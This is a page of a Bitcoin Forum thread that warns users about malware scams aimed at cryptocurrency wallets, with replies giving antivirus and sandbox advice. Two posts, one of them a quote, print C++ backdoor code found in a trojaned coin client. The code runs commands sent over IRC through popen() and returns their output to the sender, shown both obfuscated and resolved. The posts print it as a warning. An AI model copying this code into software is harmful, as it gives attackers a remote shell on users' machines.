Bitcoin Forum
December 13, 2019, 03:59:31 PM
News: Latest Bitcoin Core release: 0.19.0.1 [Torrent]
 
Pages: « 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 »
Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 165952 times)
RoseMann
Sr. Member
Activity: 277
Merit: 250
August 11, 2016, 02:56:05 AM
 #81

Thank you for this warning (I said with 30 trojan horse viruses attacking me at the same time).

Brybtc
Newbie
Activity: 12
Merit: 0
August 13, 2016, 08:11:04 PM
 #82

Speaking of antivirus, can the results from AV-TEST be trusted?

Is it impartial? Do they do proper testing or just surface easy stuff?

groggin
Legendary
Activity: 1860
Merit: 1001
September 02, 2016, 03:48:48 AM
 #83

Speaking of antivirus, can the results from AV-TEST be trusted?

Is it impartial? Do they do proper testing or just surface easy stuff?

Use www.virustotal.com to scan small files (like wallets); it uses +/- 50 AV engines to scan, and it's prolly faster than using your onboard AV.

- BUT remember, serious hackers will have no problem hiding their payload.
bilebil
Newbie
Activity: 12
Merit: 0
September 04, 2016, 02:03:22 PM
 #84

Could you list the different scams?
Qasim1234
Sr. Member
Activity: 264
Merit: 250
September 05, 2016, 09:57:22 AM
 #85

I was infected with a virus lol
shsfhs
Newbie
Activity: 1
Merit: 0
September 08, 2016, 11:50:59 AM
 #86

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins, so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
    // CBuff, CLine, CRead and CFree are macros that hide what this block does; see the resolved version below
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // the text after ":!" is taken straight from the IRC line and opened as a command
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            // collect the command's output
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            // recover the sender's nick from the ":nick!user@host" prefix
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // send the output back to the sender
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }
Here is the source code with macros resolved:
Code:
    // fires on any channel message of the form ":nick!user@host PRIVMSG <target> :! <command>"
    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // the text after ":!" is taken straight from the IRC line and run through the shell by popen()
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            // collect the command's output
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            // recover the sender's nick from the ":nick!user@host" prefix
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // send the output back to the sender as a private message
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
Sasuke.Sasuke
Member
Activity: 76
Merit: 10
December 08, 2016, 05:36:23 AM
 #87

Useful thread. I always use Sandboxie and Shadow Defender before installing or running any new program nowadays. And medium-level hackers fear VirusTotal because it sends the file for further analysis (from what I've heard) and their FUD malware loses its FUD ability. So my suggestion will be: use Sandboxie or any similar software, and still use software like Shadow Defender for any kind of new program. And before doing anything, just scan it in VirusTotal if you can.

Note: just don't trust any new person or software just like that.

Also, the user (shsfhs) above me just quoted the original thread with no reply (seems like a new botter in town).
ioanbtc
Sr. Member
Activity: 458
Merit: 251
December 27, 2016, 09:34:23 PM
 #88

If I use Malwarebytes, can I be protected?

forces1234
Member
Activity: 116
Merit: 10
December 29, 2016, 10:50:30 PM
 #89

Is there any good antivirus to handle it?
indiemax
Hero Member
Activity: 720
Merit: 500
January 19, 2017, 06:18:42 PM
 #90

Beware of links sent to your PM box, even ones that look like a link to a thread on the forum.
JanpriX
Hero Member
Activity: 1176
Merit: 529
February 11, 2017, 11:44:10 PM
 #91

Is there any good antivirus to handle it?

I would like to ask this same question here. Can anyone cite a software/site that can provide a better anti-malware program for our PC? I know that being cautious in clicking/visiting links will avert you from malware, but it wouldn't hurt if we can install a program that has a good reputation in stopping malware from getting inside our machines.

 
caribou2357
Newbie
Activity: 10
Merit: 0
February 15, 2017, 06:35:08 PM
Last edit: February 15, 2017, 06:46:41 PM by caribou2357
 #92

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!
groggin
Legendary
Activity: 1860
Merit: 1001
February 15, 2017, 07:16:09 PM
 #93

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!

There is no comprehensive overall protection; think, rather, in layers. A VPN, a good antivirus, Spybot S&D, a hosts file (HostsMan), Sandboxie, and a virtual machine should all be in place.

Avoid Win 10.
If you use 7, 8, or 8.1, remove or do not install the Microsoft spyware.
Even better, use Mac or Linux.

There is freeware available to do all this.
MWesterweele
Hero Member
Activity: 1064
Merit: 562
February 22, 2017, 06:32:40 AM
 #94

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins, so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
    // CBuff, CLine, CRead and CFree are macros that hide what this block does; see the resolved version below
    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // the text after ":!" is taken straight from the IRC line and opened as a command
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            // collect the command's output
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            // recover the sender's nick from the ":nick!user@host" prefix
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // send the output back to the sender
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }
Here is the source code with macros resolved:
Code:
    // fires on any channel message of the form ":nick!user@host PRIVMSG <target> :! <command>"
    if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        // the text after ":!" is taken straight from the IRC line and run through the shell by popen()
        FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            // collect the command's output
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            pclose(buf);
            // recover the sender's nick from the ":nick!user@host" prefix
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            // send the output back to the sender as a private message
            Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
        }
    }
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.


Thanks for informing us; however, we must know how to avoid this. We all give importance to Bitcoin, therefore we must take care of it. There are some kinds of people who want to earn bitcoin without giving any effort to it; they just want to take it from others easily. Secure your browsers, don't click anything that is not important; looks may be deceiving, brothers.

redblue!!
Newbie
Activity: 7
Merit: 0
February 24, 2017, 06:29:58 AM
 #95

Thank you .. I think it is very good information for me as a beginner. I will always support you.
superresistant
Legendary
Activity: 2030
Merit: 1095
February 25, 2017, 06:55:19 PM
 #96

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offers no protection for this, but it's very easy to protect yourself:

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit, and format it regularly.
rebel69
Member
Activity: 66
Merit: 10
February 27, 2017, 07:16:25 AM
 #97

THANK YOU FOR THE INFORMATION, MY FRIEND

passwordnow
Hero Member
Activity: 1344
Merit: 515
February 27, 2017, 01:47:25 PM
 #98

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offers no protection for this, but it's very easy to protect yourself:

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit, and format it regularly.


I just want to make it clear that formatting your computer regularly isn't a good habit at all. You are just making the lifespan of your personal computer shorter, but if you are going to do that with a garbage computer that would be fine and there's no need to worry about it. And for those people out there who can't help their fingers but click suspicious links: never believe people who are posting some links.
vapourminer
Legendary
Activity: 2494
Merit: 1251
what is this "brake pedal" you speak of?
February 27, 2017, 02:00:41 PM
 #99

Formatting/reinstalling an OS on a computer over and over does not reduce its lifespan. It's one of the surest ways of getting rid of a suspected virus/malware.

If you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce their effective lifespan; most will be long obsolete before they wear out.

Whenever I set a new rig (mining or otherwise) up, I image the OS as soon as it's patched up and all essential programs are installed. That way, all I need to do to go to a new, clean baseline OS is a one-shot restore that takes minutes.
Cherylstar86
Sr. Member
Activity: 1050
Merit: 252
March 04, 2017, 11:14:43 AM
 #100

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offers no protection for this, but it's very easy to protect yourself:

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit, and format it regularly.


I just want to make it clear that formatting your computer regularly isn't a good habit at all. You are just making the lifespan of your personal computer shorter, but if you are going to do that with a garbage computer that would be fine and there's no need to worry about it. And for those people out there who can't help their fingers but click suspicious links: never believe people who are posting some links.

Oh, I see more optional solutions to help with a lot of the problems raised in this thread, but you're right, it's not really good to format your PC immediately just to give up on solving the malware infection while the OS is still running. To preserve the lifespan of your computer you must download the most reliable PC security software that would take away all the worries you have, and I can recommend the latest version of ESET NOD32 Antivirus, now available if you search on their site online; even the trial version works totally fine.

 